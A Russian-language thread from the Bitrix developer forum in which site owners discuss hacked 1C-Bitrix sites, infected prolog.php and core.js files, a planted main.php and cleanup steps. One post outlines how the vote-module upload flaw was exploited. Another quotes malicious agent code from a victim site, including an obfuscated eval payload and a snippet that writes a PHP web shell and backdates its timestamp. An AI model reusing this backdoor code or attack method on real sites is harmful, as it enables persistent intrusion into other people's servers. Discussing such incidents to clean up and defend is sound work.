|
Разработчикам |
|
Илья,
я так понимаю поиск бэкдоров ничего не нашел ... тогда дырку надо самому искать если повезёт - дату изменения файлов злоумышленник не изменит обратно, тогда можно по дате изменения в логах глянуть какой файл "дёрнули" и уже в нём поискать бэкдор если не повезёт, то сложнее - писать анализатор изменившихся файлов и запускать его почаще (в принципе в Вашем случаем можно на эти два файла и "ловить", тогда можно почаще "дёргать" "ловилку") как только изменение будет "поймано" - анализ логов за последний период запуска "ловилки" в общем процесс довольно творческий ... могу помочь в свободное от работы время, но сразу предупреждаю - я не меценат  |
|
|
|
|
вообще судя по файлам - это не через vote, думаю это что то из более раннего |
|||
|
|
|
1. лицензия куплена 2. не отключена 3. работает хотя для чего я вам это пишу? от вас навряд-ли я что-то полезное почерпну... |
|||||
|
|
|
даты скорее всего "злоумышленник" поменял, логи по последним изменениям ничего страшного не показывают, про "ловилку" хорошая мысль, попробую вникнуть как ее можно применить, спасибо!!! |
|||
|
|
|
|
У вас рабочая лицензия, все обновлено и при этом сайт ломают?
Странная ситуация. Что говорит об этом суппорт? |
|
|
|
|
|
|||
|
|
|
|
Не знаю насколько у Вас тотже вирус, что был связан с уязвимостью vote.
Я по исходникам накопал следующее кому интересно. Атака была на файл uf.php с определенной структурой В параметрах структуры был определен класс CFileUploader. Именно он и создавался из строки а потом проверялся на instanceOf Connector. Да ошибка выводилась. Но был вызван конструктор CFileUploader Зачем битрикс делал логику загрузки на конструкторе - ума не приложу. Таким макаром загружалась папка в upload/tmp/ и на событии onFileIsStarted прпатчивался агент, который и создавал бэкдур putin_hui...php Как детально не могу сказать, но мне удалось воспроизвести загрузку файла на потенциально уязвимой машине. Патч битров заключался в использовании функции is_a , которая не создает объект а проверяет его наличие. По идее если гдето остался аналогичный вариант подгрузки то загрузить нефиг делать, но я надеюсь Ребята из битрикса знают что делают и дырок нигде нет )))). Рефлексия , конечно дело хорошее но мне кажется на публичке разрешать это использовать както не айс. Мало того в коде проверки проверяется актуальность сессии с помошью функции check_bitrix_sessid() Но эта функция обходится на раз два с помощью опятьже открытого скрипта tools/composite_data.php Тут инфа по серверу, для чего делать его открытым не знаю. Кстати этот скрпит доступен на всех обновленных машинах. |
|
|
|
|
/bitrix/components/bitrix/main.file.input/main.php /bitrix/components/bitrix/main.file.input/set_list.php Второго файла вероятно не будет, а в первом - мишура для отвлечения внимания (основа - код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре |
|||
|
|
|
но у меня немножко другой вирус.... и где искать концы непонятно.... |
|||
|
|
|
дата изменения этой папки как-раз на момент перед взломом, один из файлов на месте, но дата как и у всех остальных в папке, а второго нет, видимо самоудалился... main.php не стал удалять пока, очистил внутренности, будем посмотреть...... |
|||
|
|
|
|
|||
|
|
|
|
Тоже подверглись взлому. помимо упомянутого файла появились 2 агента
1. $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4% 2. $fName = str_replace('/modules/main/classes/mysql', '', dirname(__FILE__)).'/admin/composite_seminarians.php'; $files = scandir(dirname($fName)); file_put_contents($fName, '<?php V47dc049a84b(@$_POST[\'c3a1e58\']); function V47dc049a84b($I018d087c){ @eval($I018d087c); } ?> '); touch($fName, filemtime(dirname($fName).'/'.$files[2])); |
|
|
|
|
|
Что касается файлов
/bitrix/components/bitrix/main.file.input/main.php /bitrix/js/main/core/core.js prolog.php эти уязвимости были обнаружены на сайтах, которые крутятся на таймвебе, может кто-нибудь подтвердить или опровергнуть это? |
|
|
|
|
|
У меня на 2х из 3х сайтах были обнаружены следы взлома. Все 3 - Timeweb
|
|
|
|
|
|
опровергаю, у меня другой хостинг (не таймвеб),
но все три уязвимости присутствовали: /bitrix/components/bitrix/main.file.input/main.php /bitrix/js/main/core/core.js prolog.php |
|
|
|
|
|
Такая же беда периодически встраивается -
удалил руками. |
|
|
|
|
Полагаю, хостинг не причем. У меня подобная проблема - на двух сайтах размещенных на Beget. Причем на двух из пяти сайтах. Может совпадение, но оба проблемных сайта используют студийные темы шаблоны, один Аспро:NEXT, второй: Электросила. Другие сайты, шаблоны которые были сверстаны и натянуты на битрикс - работают без проблем. Могу сказать, что чистка руками указанных файлов: bitrix/modules/main/include/prolog.php /public_html/bitrix/js/main/core/core.js не достаточна, уязвимость остается. После удаления вредоносного кодав указанных фалов, код встраивается снова. Вот к примеру, почистил указанные файлы, на через несколько дней Яндекс приостановил рекламные компании и прислал письмо:
Сложилось впечатление, что данный вредоносный код появляется раз в неделю, в выходные дни. Возможно так задумано. В понедельник - вторник очистил фалы. И всю неделю ежедневно проверял их на наличие мусора. В пятницу не было, а в воскресение получил письмо от Яндекса, проверил - в файел bitrix/modules/main/include/prolog.php - опять появился проблемный код. Как убрать уязвимость окончательно? |
|||||
|
|
|
|
|||
|
|
|
|
У нас такая же проблема. Появилось 1 июля, заметили только сейчас.
Шаблон сайта - ни один из перечисленных выше, хостинг - не таймвеб. Почистил prolog, core и удалил main.php. Агентов, упомянутых выше, нет. Файла /bitrix/tools/putin...php тоже нет Пока не знаю как сделать так, чтобы больше это не появлялось. |
|
|
|
|
|
Обновить сайт до последней версии битрикс?
|
|
|
|
|
Не всегда удается сделать это быстро. Нужно согласовывать это с заказчиком, тестировать, исправлять баги и т.д. |
|||
|
|
|
|
Ситуация напрягает, в файл bitrix/modules/main/include/prolog.php периодически встраивается код, который подгружается и при переходе с поисковых систем перенаправляет сайт на левую страницу.
Вынужден остановить рекламные компании Яндекс.Директ - так как при переходе с поиска деньги за клик списываются - а пользователь переходит на другую страницу. В понедельник очистил руками, через день проблема появилась опять, правда уже с ссылкой на другой домен.
Что делать? Какие есть окончательные решения проблемы? |
|||
|
|
|
|
Юрий Шишнин, очищаете файл bitrix/modules/main/include/prolog.php от встроенного кода,
удаляете файл /bitrix/components/bitrix/main.file.input/main.php этот файл создан злоумышленниками, в незараженной установке этого файла быть не должно. Обновляете ядро и все модули до последней версии. Если у вас ядро уже последней версии, то файл /bitrix/js/main/core/core.js нужно заменить с чистой установки этой же редакции БУС, т.к. у вас core.js тоже заражен. А при обновлении ядра core.js перезаписывается чистым файлом без заразы. |
||||
|
|
|
|||
© 2001-2025 «Битрикс», «1С-Битрикс». Работает на 1С-Битрикс: Управление сайтом. 
Политика конфиденциальности